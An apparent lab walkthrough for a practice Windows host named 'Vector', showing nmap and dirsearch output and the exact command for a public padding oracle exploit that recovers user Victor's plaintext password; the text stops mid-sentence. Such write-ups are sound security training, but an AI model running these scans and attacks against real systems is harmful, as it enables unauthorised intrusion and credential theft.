sudo nmap -sS -sCV -p- -Pn -v -oN Nmap/Initial-Vector Vector
# Nmap 7.94SVN scan initiated Fri Jun 21 04:39:14 2024 as: nmap -sS -sCV -p- -Pn -v -oN Nmap/Initial-Vector Vector
Nmap scan report for Vector (192.168.222.119)
Host is up (0.26s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2290/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-21T08:50:25+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=vector
| Issuer: commonName=vector
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-22T16:36:29
| Not valid after: 2024-09-21T16:36:29
| MD5: 3a68:bca7:93da:d9d9:0748:1a1d:b6a1:9e0c
|_SHA-1: 5ae7:a6d8:afd7:50a4:e1bf:d7b6:21c7:23b9:7aac:a79a
| rdp-ntlm-info:
| Target_Name: VECTOR
| NetBIOS_Domain_Name: VECTOR
| NetBIOS_Computer_Name: VECTOR
| DNS_Domain_Name: vector
| DNS_Computer_Name: vector
| Product_Version: 10.0.17763
|_ System_Time: 2024-06-21T08:49:44+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-06-21T08:49:43
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Fri Jun 21 04:50:27 2024 -- 1 IP address (1 host up) scanned in 672.99 seconds
sudo dirsearch -u <IP:port> -w /path/to/wordlist
# Dirsearch started Fri Jun 21 04:49:16 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u <http://Vector> -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
404 2KB <http://Vector/aux>
404 2KB <http://Vector/com1>
404 2KB <http://Vector/com2>
404 2KB <http://Vector/com3>
404 2KB <http://Vector/com4>
404 2KB <http://Vector/con>
404 2KB <http://Vector/lpt2>
404 2KB <http://Vector/lpt1>
404 2KB <http://Vector/nul>
404 2KB <http://Vector/prn>
Using this exploit
<https://github.com/mpgn/Padding-oracle-attack>
An exploit for the Padding Oracle Attack. Tested against ASP.NET, works like a charm. The CBC mode must use PKCS7 for the padding block. This is an implementation of this great article Padding Oracle Attack. Since the article is not very well written and may be unclear, I made an explanation in the readme. I advise you to read it if you want to understand the basics of the attack. This exploit allows block sizes of 8 or 16. This means it can be used if the cipher uses AES or DES. You can find instructions to launch the attack here.
so here’s a breakdown of the tool’s params:
so the full format for this exploit to work is this
sudo python exploit.py -c 4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488 -l 16 --host Vector:2290 -u /?c= -v --error '<span id="MyLabel">0</span>'
Working !
Plain text password of the user Victor
After gaining the password,